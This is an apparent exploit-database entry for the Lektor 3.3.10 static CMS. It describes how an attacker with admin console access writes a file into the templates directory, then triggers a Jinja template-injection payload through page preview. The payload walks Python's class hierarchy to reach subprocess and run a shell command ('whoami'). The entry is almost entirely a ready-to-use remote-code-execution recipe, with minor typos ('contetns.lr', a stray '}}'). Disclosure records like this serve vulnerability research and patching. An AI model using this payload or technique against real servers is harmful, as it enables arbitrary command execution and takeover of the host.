# Exploit Title: Lektor static content management system Version: 3.3.10 Arbitrary File upload # Date: 20/03/2024 # Exploit Author: kai6u # Vendor Homepage: https://www.getlektor.com/ # Software Link: https://github.com/lektor/lektor/releases/tag/v3.3.10 # Version: 3.3.10 # Tested on: Ubuntu 22.04 1 ) Access to the administrator console via NW first creates a contetns.lr file containing the payload using Lektor's Add Page feature, specifying the templates directory.(Attacker also can upload to any directory.) Payload: {{ ''.__class__.__mro__[1].__subclasses__()[276]('whoami',shell=True,stdout=-1).communicate()[0].strip()}} }} 2 ) Create a new page by specifying the created contents.lr as template. 3 ) Use the preview function to check the sample page with the specified templates.